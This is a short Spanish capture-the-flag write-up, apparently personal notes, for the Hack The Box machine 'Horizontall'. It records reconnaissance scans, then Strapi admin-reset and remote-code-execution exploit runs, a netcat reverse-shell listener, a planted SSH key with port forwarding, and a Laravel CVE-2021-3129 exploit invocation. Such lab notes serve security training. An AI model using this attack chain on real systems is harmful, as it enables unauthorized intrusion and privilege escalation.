Cu3rv0x

nmap -A -p- -oA horizontall 10.129.207.161 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210903132214.png

nmap -sC -sV -O -p- -oA horizontall 10.129.207.161

nmap -sU -O -p- -oA horizontall-udp 10.129.207.161

nikto -h 10.129.207.161

dirsearch --url=http://10.129.207.161/ --threads=50 --random-agent -o control.html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

whatweb http://10.129.207.161

Pasted image 20210903132405.png

http://horizontall.htb

Pasted image 20210903132525.png

gobuster dns -d horizontall.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Encontramos una direccion api-prod

Pasted image 20210903133248.png

http://api-prod.horizontall.htb/users

Pasted image 20210903133622.png

http://api-prod.horizontall.htb/reviews

Pasted image 20210903133704.png

http://api-prod.horizontall.htb/admin/auth/login

Pasted image 20210903133901.png

Pasted image 20210903134047.png

https://thatsn0tmysite.wordpress.com/2019/11/15/x05/

python3 exploit.py admin@horizontall.htb http://api-prod.horizontal.htb admin

Aqui podemos adquirir el JWT

Pasted image 20210903135019.png

Las credenciales son admin:admin Nos metemos a la pagina.

Pasted image 20210903135235.png

https://bittherapy.net/post/strapi-framework-remote-code-execution

python3 exploit.py admin@horizontall.htb http://api-prod.horizontal.htb root

Pasted image 20210903135757.png

Hacemos un curl a la pagina

nc -lvnp 443

Pasted image 20210903135916.png

curl 127.0.0.1:8000

Vemos que es Laravel

Pasted image 20210903140616.png

Creamos un id_rsa y lo subimos al servidor

Pasted image 20210903142037.png

python3 -m http.server 80

Pasted image 20210903142107.png

ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@horizontall.htb

Pasted image 20210903143945.png

python3 exploit2.py http://localhost:8000 Monolog/RCE1 "whoami"

Pasted image 20210903143914.png

https://github.com/nth347/CVE-2021-3129_exploit

Pasted image 20210903144120.png